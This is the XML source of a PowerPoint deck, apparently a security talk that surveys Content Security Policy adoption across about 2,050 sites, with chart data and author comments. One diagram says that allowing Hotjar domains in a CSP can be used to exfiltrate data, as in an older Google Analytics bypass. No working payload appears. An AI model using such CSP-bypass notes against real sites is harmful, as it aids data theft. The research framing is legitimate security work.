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tags/tag2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/theme/themeOverride6.xml" ContentType="application/vnd.openxmlformats-officedocument.themeOverride+xml"/>
  <Override PartName="/ppt/tags/tag3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/theme/themeOverride7.xml" ContentType="application/vnd.openxmlformats-officedocument.themeOverride+xml"/>
  <Override PartName="/ppt/tags/tag4.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comments/modernComment_123_93AF661C.xml" ContentType="application/vnd.ms-powerpoint.comments+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1_C4436FAA.xml" ContentType="application/vnd.ms-powerpoint.comment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comments/modernComment_158_6D17BFAF.xml" ContentType="application/vnd.ms-powerpoint.comments+xml"/>
  <Override PartName="/ppt/tags/tag26.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+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82_66B4B1E8.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257" r:id="rId3"/>
    <p:sldId id="264" r:id="rId4"/>
    <p:sldId id="267" r:id="rId5"/>
    <p:sldId id="367" r:id="rId6"/>
    <p:sldId id="427" r:id="rId7"/>
    <p:sldId id="359" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="258" r:id="rId10"/>
    <p:sldId id="259" r:id="rId11"/>
    <p:sldId id="260" r:id="rId12"/>
    <p:sldId id="360" r:id="rId13"/>
    <p:sldId id="418" r:id="rId14"/>
    <p:sldId id="419" r:id="rId15"/>
    <p:sldId id="361" r:id="rId16"/>
    <p:sldId id="362" r:id="rId17"/>
    <p:sldId id="363" r:id="rId18"/>
    <p:sldId id="357" r:id="rId19"/>
    <p:sldId id="428" r:id="rId20"/>
    <p:sldId id="266" r:id="rId21"/>
    <p:sldId id="271" r:id="rId22"/>
    <p:sldId id="270" r:id="rId23"/>
    <p:sldId id="395" r:id="rId24"/>
    <p:sldId id="376" r:id="rId25"/>
    <p:sldId id="397" r:id="rId26"/>
    <p:sldId id="272" r:id="rId27"/>
    <p:sldId id="410" r:id="rId28"/>
    <p:sldId id="412" r:id="rId29"/>
    <p:sldId id="273" r:id="rId30"/>
    <p:sldId id="413" r:id="rId31"/>
    <p:sldId id="415" r:id="rId32"/>
    <p:sldId id="275" r:id="rId33"/>
    <p:sldId id="276" r:id="rId34"/>
    <p:sldId id="375" r:id="rId35"/>
    <p:sldId id="406" r:id="rId36"/>
    <p:sldId id="426" r:id="rId37"/>
    <p:sldId id="431" r:id="rId38"/>
    <p:sldId id="408" r:id="rId39"/>
    <p:sldId id="396" r:id="rId40"/>
    <p:sldId id="403" r:id="rId41"/>
    <p:sldId id="387" r:id="rId42"/>
    <p:sldId id="423" r:id="rId43"/>
    <p:sldId id="424" r:id="rId44"/>
    <p:sldId id="279" r:id="rId45"/>
    <p:sldId id="421" r:id="rId46"/>
    <p:sldId id="422" r:id="rId47"/>
    <p:sldId id="281" r:id="rId48"/>
    <p:sldId id="372" r:id="rId49"/>
    <p:sldId id="282" r:id="rId50"/>
    <p:sldId id="430" r:id="rId51"/>
    <p:sldId id="284" r:id="rId52"/>
    <p:sldId id="294" r:id="rId53"/>
    <p:sldId id="290" r:id="rId54"/>
    <p:sldId id="398" r:id="rId55"/>
    <p:sldId id="291" r:id="rId56"/>
    <p:sldId id="429" r:id="rId57"/>
    <p:sldId id="302" r:id="rId58"/>
    <p:sldId id="285" r:id="rId59"/>
    <p:sldId id="289" r:id="rId60"/>
    <p:sldId id="384" r:id="rId61"/>
    <p:sldId id="292" r:id="rId62"/>
    <p:sldId id="296" r:id="rId63"/>
    <p:sldId id="297" r:id="rId64"/>
    <p:sldId id="300" r:id="rId65"/>
    <p:sldId id="299" r:id="rId66"/>
    <p:sldId id="304" r:id="rId67"/>
    <p:sldId id="293" r:id="rId68"/>
    <p:sldId id="401" r:id="rId69"/>
    <p:sldId id="327" r:id="rId70"/>
    <p:sldId id="301" r:id="rId71"/>
    <p:sldId id="305" r:id="rId72"/>
    <p:sldId id="308" r:id="rId73"/>
    <p:sldId id="307" r:id="rId74"/>
    <p:sldId id="309" r:id="rId75"/>
    <p:sldId id="402" r:id="rId76"/>
    <p:sldId id="340" r:id="rId77"/>
    <p:sldId id="344" r:id="rId78"/>
    <p:sldId id="345" r:id="rId79"/>
    <p:sldId id="310" r:id="rId80"/>
    <p:sldId id="317" r:id="rId81"/>
    <p:sldId id="316" r:id="rId82"/>
    <p:sldId id="313" r:id="rId83"/>
    <p:sldId id="315" r:id="rId84"/>
    <p:sldId id="400" r:id="rId85"/>
    <p:sldId id="417" r:id="rId86"/>
    <p:sldId id="420" r:id="rId87"/>
    <p:sldId id="405" r:id="rId88"/>
    <p:sldId id="404" r:id="rId89"/>
    <p:sldId id="373" r:id="rId90"/>
    <p:sldId id="374" r:id="rId91"/>
    <p:sldId id="386" r:id="rId92"/>
    <p:sldId id="358"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A404C7-DAFD-6698-5B9D-408648286C15}" name="Felipe Molina" initials="FM" userId="7e53632c514f28b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900"/>
    <a:srgbClr val="C00000"/>
    <a:srgbClr val="B40000"/>
    <a:srgbClr val="FF7D7D"/>
    <a:srgbClr val="E5D072"/>
    <a:srgbClr val="972F51"/>
    <a:srgbClr val="54972F"/>
    <a:srgbClr val="F5F5F5"/>
    <a:srgbClr val="97842F"/>
    <a:srgbClr val="2021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C8A321-3F0B-4316-8B26-8900C1677251}" v="226" dt="2023-08-09T09:56:37.708"/>
    <p1510:client id="{D2864856-8010-4F82-B253-360059AB9DA3}" v="1971" dt="2023-08-08T10:40:19.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6" autoAdjust="0"/>
    <p:restoredTop sz="91892" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="105" d="100"/>
          <a:sy n="105" d="100"/>
        </p:scale>
        <p:origin x="84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912297052470212"/>
          <c:y val="0.16076908782287208"/>
          <c:w val="0.4453660023691729"/>
          <c:h val="0.81771042399046345"/>
        </c:manualLayout>
      </c:layout>
      <c:pieChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>CSP</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:dPt>
            <c:idx val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FF7900"/>
              </a:solidFill>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000001-0D6D-4D85-B48F-FF4BBB229E89}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="7605FF"/>
              </a:solidFill>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000003-0D6D-4D85-B48F-FF4BBB229E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D6D-4D85-B48F-FF4BBB229E89}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="0"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="-5.9611525329245352E-2"/>
                  <c:y val="0.18812052036312701"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>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0D6D-4D85-B48F-FF4BBB229E89}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="1"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="6.2044631036164727E-2"/>
                  <c:y val="-8.9800477145595928E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>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0D6D-4D85-B48F-FF4BBB229E89}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="2"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="-3.1399836252817566E-2"/>
                  <c:y val="1.1246364474710934E-2"/>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0D6D-4D85-B48F-FF4BBB229E89}"/>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showLegendKey val="0"/>
            <c:showVal val="1"/>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Yes</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>No</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Report-Only</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2:$B$4</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>104353</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>898603</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>4416</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000006-0D6D-4D85-B48F-FF4BBB229E8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58551416277611312"/>
          <c:y val="0.10546075511057221"/>
          <c:w val="0.31046627515591357"/>
          <c:h val="5.8993504190354581E-2"/>
        </c:manualLayout>
      </c:layout>
      <c:overlay val="0"/>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
      <c:txPr>
        <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="t" anchorCtr="0"/>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21_C4436FAA.xml><?xml version="1.0" encoding="utf-8"?>
<p188:cmLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p188="http://schemas.microsoft.com/office/powerpoint/2018/8/main">
  <p188:cm id="{67C7081D-BBA5-48F6-A831-060347293A0F}" authorId="{80A404C7-DAFD-6698-5B9D-408648286C15}" created="2023-07-28T09:25:23.119">
    <pc:sldMkLst xmlns:pc="http://schemas.microsoft.com/office/powerpoint/2013/main/command">
      <pc:docMk/>
      <pc:sldMk cId="3292753834" sldId="289"/>
    </pc:sldMkLst>
    <p188:txBody>
      <a:bodyPr/>
      <a:lstStyle/>
      <a:p>
        <a:r>
          <a:rPr lang="en-GB"/>
          <a:t>Why I need a script-src with *.hotjar.com? I can just use default-src or connect-src.
Record again.</a:t>
        </a:r>
      </a:p>
    </p188:txBody>
  </p188:cm>
</p188:cmLst>
</file>

<file path=ppt/comments/modernComment_123_93AF661C.xml><?xml version="1.0" encoding="utf-8"?>
<p188:cmLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p188="http://schemas.microsoft.com/office/powerpoint/2018/8/main">
  <p188:cm id="{D23E2FE5-5A95-4EA5-8928-C8C13A095564}" authorId="{80A404C7-DAFD-6698-5B9D-408648286C15}" created="2023-07-28T09:23:17.687">
    <pc:sldMkLst xmlns:pc="http://schemas.microsoft.com/office/powerpoint/2013/main/command">
      <pc:docMk/>
      <pc:sldMk cId="2477745692" sldId="291"/>
    </pc:sldMkLst>
    <p188:txBody>
      <a:bodyPr/>
      <a:lstStyle/>
      <a:p>
        <a:r>
          <a:rPr lang="en-GB"/>
          <a:t>Add a new slide to show how injecting a third party site would look like</a:t>
        </a:r>
      </a:p>
    </p188:txBody>
  </p188:cm>
</p188:cmLst>
</file>

<file path=ppt/comments/modernComment_158_6D17BFAF.xml><?xml version="1.0" encoding="utf-8"?>
<p188:cmLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p188="http://schemas.microsoft.com/office/powerpoint/2018/8/main">
  <p188:cm id="{29153793-061F-4D44-9B0D-6F0CF6C13830}" authorId="{80A404C7-DAFD-6698-5B9D-408648286C15}" created="2023-07-28T09:41:54.552">
    <pc:sldMkLst xmlns:pc="http://schemas.microsoft.com/office/powerpoint/2013/main/command">
      <pc:docMk/>
      <pc:sldMk cId="1830272943" sldId="344"/>
    </pc:sldMkLst>
    <p188:txBody>
      <a:bodyPr/>
      <a:lstStyle/>
      <a:p>
        <a:r>
          <a:rPr lang="en-GB"/>
          <a:t>Add a previous slide wher the negative test is seen</a:t>
        </a:r>
      </a:p>
    </p188:txBody>
  </p188:cm>
</p188:cmLst>
</file>

<file path=ppt/comments/modernComment_182_66B4B1E8.xml><?xml version="1.0" encoding="utf-8"?>
<p188:cmLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p188="http://schemas.microsoft.com/office/powerpoint/2018/8/main">
  <p188:cm id="{2386171A-44D9-4D32-9B3A-EF9E2798269A}" authorId="{80A404C7-DAFD-6698-5B9D-408648286C15}" created="2023-07-28T12:19:28.862">
    <ac:txMkLst xmlns:ac="http://schemas.microsoft.com/office/drawing/2013/main/command">
      <pc:docMk xmlns:pc="http://schemas.microsoft.com/office/powerpoint/2013/main/command"/>
      <pc:sldMk xmlns:pc="http://schemas.microsoft.com/office/powerpoint/2013/main/command" cId="1723118056" sldId="386"/>
      <ac:spMk id="15" creationId="{AB62E7CC-7B76-B4A3-2081-CED04FC2A094}"/>
      <ac:txMk cp="191" len="6">
        <ac:context len="262" hash="17255527"/>
      </ac:txMk>
    </ac:txMkLst>
    <p188:pos x="5100542" y="4110165"/>
    <p188:txBody>
      <a:bodyPr/>
      <a:lstStyle/>
      <a:p>
        <a:r>
          <a:rPr lang="en-GB"/>
          <a:t>Note to self. Research these technologies and how to bypass them.</a:t>
        </a:r>
      </a:p>
    </p188:txBody>
  </p188:cm>
</p188:cmLst>
</file>

<file path=ppt/diagrams/_rels/data1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google-analytics.com/"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www.google-analytics.com/"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www.google-analytics.com/"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www.google-analytics.com/"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77883-98B3-45AA-8230-B250F208076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EFD7051-D69E-47F6-99E8-1DC24B435DFC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>~2050 Sites in my DB</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{721DEF2F-F416-41A5-A05F-758F99FDC0C8}" type="parTrans" cxnId="{7BD6C007-8DFD-4C62-B453-48140D3C0740}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{755D3C55-1B00-43B7-B8A9-19DB61B8AFB8}" type="sibTrans" cxnId="{7BD6C007-8DFD-4C62-B453-48140D3C0740}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>Symptoms:</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0" err="1"/>
            <a:t>xxxx-src</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>: *.hotjar.com, ask.hotjar.io</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE15717C-0244-4042-8917-61342E9C39EB}" type="parTrans" cxnId="{F1768B82-27A8-42E6-B9EE-B515186008BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56F4FFA3-1D9A-4E57-98E9-5575C45D8158}" type="sibTrans" cxnId="{F1768B82-27A8-42E6-B9EE-B515186008BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Can be used to Exfiltrate data</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1873F028-2796-4F98-8265-F3360B812BE8}" type="parTrans" cxnId="{09BEC6BA-4684-4792-B590-7374B06F72D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84F69CA5-A867-42F3-A080-4906F780782F}" type="sibTrans" cxnId="{09BEC6BA-4684-4792-B590-7374B06F72D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{603EAE19-D084-45BB-B6C3-7ACC027B0E7D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Pretty much like the old </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>www.google-analytics.com</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t> bypass</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3556A61F-C9DA-4186-A48E-B1549CDD32A1}" type="parTrans" cxnId="{98D881E8-08E4-4F32-85BE-C3476A57CC5A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{61C3369B-6006-4F4F-9114-9264B88C39C0}" type="sibTrans" cxnId="{98D881E8-08E4-4F32-85BE-C3476A57CC5A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" type="pres">
      <dgm:prSet presAssocID="{09C77883-98B3-45AA-8230-B250F208076F}" presName="vert0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D760DC72-46C1-4898-AD8D-16575EA3CD55}" type="pres">
      <dgm:prSet presAssocID="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DC960AB6-70EE-48D0-A814-31914A5EA9EE}" type="pres">
      <dgm:prSet presAssocID="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3D4D1DD2-1902-47AC-904F-9723F18DB6AD}" type="pres">
      <dgm:prSet presAssocID="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" presName="tx1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16FADC84-2696-4969-9978-EE4ACD836C5D}" type="pres">
      <dgm:prSet presAssocID="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{877B9B36-37C2-42AB-B290-2D5CFBAE4F98}" type="pres">
      <dgm:prSet presAssocID="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4F85C694-E1EE-466D-80E1-79C5B39C534B}" type="pres">
      <dgm:prSet presAssocID="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3602B78D-1E64-41C4-81A9-043B057A6F0E}" type="pres">
      <dgm:prSet presAssocID="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" presName="tx1" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2671FA71-80B5-47F9-86C3-32D2F224EDB1}" type="pres">
      <dgm:prSet presAssocID="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{88F358FB-2408-41AF-A257-5964FED42C08}" type="pres">
      <dgm:prSet presAssocID="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{455DB8E0-D814-44BE-AB12-F0CA173AF294}" type="pres">
      <dgm:prSet presAssocID="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{87D9E374-6DBC-4B93-8F23-73523EB7F9DB}" type="pres">
      <dgm:prSet presAssocID="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" presName="tx1" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5630021E-01C2-4224-B2FD-13882086D125}" type="pres">
      <dgm:prSet presAssocID="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F01B13FD-4A30-4650-996B-814F40E90546}" type="pres">
      <dgm:prSet presAssocID="{603EAE19-D084-45BB-B6C3-7ACC027B0E7D}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C780EBB7-6784-4FD0-99F0-12D3E92C2169}" type="pres">
      <dgm:prSet presAssocID="{603EAE19-D084-45BB-B6C3-7ACC027B0E7D}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1EF2ECFB-C125-4897-B28E-5ADDA643D3F6}" type="pres">
      <dgm:prSet presAssocID="{603EAE19-D084-45BB-B6C3-7ACC027B0E7D}" presName="tx1" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC0ED00C-8439-40A4-82FB-7014EB968ED7}" type="pres">
      <dgm:prSet presAssocID="{603EAE19-D084-45BB-B6C3-7ACC027B0E7D}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7BD6C007-8DFD-4C62-B453-48140D3C0740}" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" srcOrd="0" destOrd="0" parTransId="{721DEF2F-F416-41A5-A05F-758F99FDC0C8}" sibTransId="{755D3C55-1B00-43B7-B8A9-19DB61B8AFB8}"/>
    <dgm:cxn modelId="{4A4E020C-A450-4703-8F9E-BEAEAA44A6DF}" type="presOf" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{95643A34-3925-496D-828E-03EE978991E4}" type="presOf" srcId="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" destId="{3D4D1DD2-1902-47AC-904F-9723F18DB6AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{EDA1304F-4B45-4447-8D9D-C1CB904F9026}" type="presOf" srcId="{603EAE19-D084-45BB-B6C3-7ACC027B0E7D}" destId="{1EF2ECFB-C125-4897-B28E-5ADDA643D3F6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{F1768B82-27A8-42E6-B9EE-B515186008BE}" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" srcOrd="1" destOrd="0" parTransId="{FE15717C-0244-4042-8917-61342E9C39EB}" sibTransId="{56F4FFA3-1D9A-4E57-98E9-5575C45D8158}"/>
    <dgm:cxn modelId="{6B54A19B-8F83-4143-86E9-66895FFD5B37}" type="presOf" srcId="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" destId="{3602B78D-1E64-41C4-81A9-043B057A6F0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{09BEC6BA-4684-4792-B590-7374B06F72D8}" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" srcOrd="2" destOrd="0" parTransId="{1873F028-2796-4F98-8265-F3360B812BE8}" sibTransId="{84F69CA5-A867-42F3-A080-4906F780782F}"/>
    <dgm:cxn modelId="{98D881E8-08E4-4F32-85BE-C3476A57CC5A}" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{603EAE19-D084-45BB-B6C3-7ACC027B0E7D}" srcOrd="3" destOrd="0" parTransId="{3556A61F-C9DA-4186-A48E-B1549CDD32A1}" sibTransId="{61C3369B-6006-4F4F-9114-9264B88C39C0}"/>
    <dgm:cxn modelId="{07FDB9F3-A009-4B26-A11E-041B398C1E90}" type="presOf" srcId="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" destId="{87D9E374-6DBC-4B93-8F23-73523EB7F9DB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A320D686-B34F-42E9-A68C-F031782B9AF0}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{D760DC72-46C1-4898-AD8D-16575EA3CD55}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{706C4974-41C2-4849-856C-FFFC6B58020F}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{DC960AB6-70EE-48D0-A814-31914A5EA9EE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{DE8BAE84-8EE4-471A-9B38-9FF9F225896E}" type="presParOf" srcId="{DC960AB6-70EE-48D0-A814-31914A5EA9EE}" destId="{3D4D1DD2-1902-47AC-904F-9723F18DB6AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{6DA14C0F-0BEC-4054-9E34-64922B63122C}" type="presParOf" srcId="{DC960AB6-70EE-48D0-A814-31914A5EA9EE}" destId="{16FADC84-2696-4969-9978-EE4ACD836C5D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
